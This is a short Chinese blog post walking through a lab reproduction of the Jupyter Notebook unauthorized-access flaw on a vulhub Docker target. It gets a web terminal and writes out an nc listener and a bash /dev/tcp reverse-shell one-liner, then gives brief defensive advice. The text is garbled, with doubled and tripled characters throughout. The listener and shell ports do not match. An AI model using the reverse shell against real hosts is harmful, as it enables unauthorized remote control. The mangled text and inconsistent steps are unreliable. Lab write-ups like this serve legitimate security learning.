Jupyter Notebook 未授权访问漏洞简单复现


简介及危害

Jupyter Notebook(此前被称为 IPython notebook)是一一个交互式笔记本,支支持运行行行 40 多种编
程语言言。 如果管理理员未为Jupyter Notebook配置密码,将导致未授权访问漏漏洞洞,游客可在其中创建一一
个console并执行行行任意Python代码和命令。

环境介绍

# 目标
环境来源:https://github.com/vulhub/vulhub/blob/master/jupyter/notebook-rce/
ip地址: 192.168.0.100

开始测试

1.运行测试环境:

docker-compose up -d

2.访问目标地址 http://192.168.0.100:8888

3.New > Terminal 创建控制台:可以直接执行任意命令

4.后面就直接执行任意命令,比如反弹shell等

# 本机监听
nc -lvp 5555

# 目标执行
bash -i >& /dev/tcp/x.x.x.x/8080 0>&1

防御手段

  • 开启身份验证, 防止止未经授权用用户访问
  • 访问控制策略略, 限制IP访问, 绑定固定IP

文章作者: 剑胆琴心
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 剑胆琴心 !
评论
  目录